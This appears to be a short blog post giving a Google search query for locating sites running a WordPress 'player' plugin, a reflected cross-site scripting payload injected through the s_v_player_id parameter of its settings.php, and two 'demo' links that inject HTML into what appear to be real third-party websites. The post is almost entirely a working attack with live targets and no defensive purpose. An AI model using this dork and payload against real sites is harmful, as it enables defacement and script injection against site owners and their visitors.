
inurl:wp-content/plugins/player/settings.phpScript:
site.com/wordpress/wp-content/plugins/player/settings.php?s_v_player_id="/><script>alert(1);</script>
Demo:
http://www.cintro.com.br/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1&s_v_player_id=%3Ch1%3EJoker%20Dark%20Knight%3C/h1%3E
http://fmst.hephzibah.com.ng/wp-content/plugins/player/settings.php?playlist=1&theme=2&s_v_player_id=%3Ch1%3EJoker%20Dark%20Knight%3C/h1%3E
Không có nhận xét nào:
Đăng nhận xét